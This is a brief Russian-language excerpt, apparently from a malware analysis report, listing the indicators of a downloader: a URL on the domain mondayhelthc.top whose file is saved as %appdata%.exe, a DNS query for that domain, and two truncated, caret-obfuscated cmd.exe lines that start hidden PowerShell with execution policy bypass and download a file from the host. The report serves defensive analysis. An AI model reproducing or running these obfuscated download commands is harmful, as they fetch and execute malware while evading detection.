Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^weR^shEll.^ExE -E^XE^c^utiONPo^li^cy ^ByPa^SS -n^op^RofILE -^w^I^ndowst^ylE ^Hid^den (^NEw^-o^b^je^cT^ ^SY^s^TeM.n^Et.^WE^BCL^IeNt)^.^DOWnLoadfI^L^e('http://mondayhel...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "p^O^weR^shEll.^ExE -E^XE^c^utiONPo^li^cy ^ByPa^SS -n^op^RofILE -^w^I^ndowst^ylE ^Hid^den (^NEw^-o^b^je^cT^ ^SY^s^TeM.n^Et.^WE^BCL^IeNt)^.^DOWnLoadfI^L^e('http://mondayhel...' (со скрытым окном)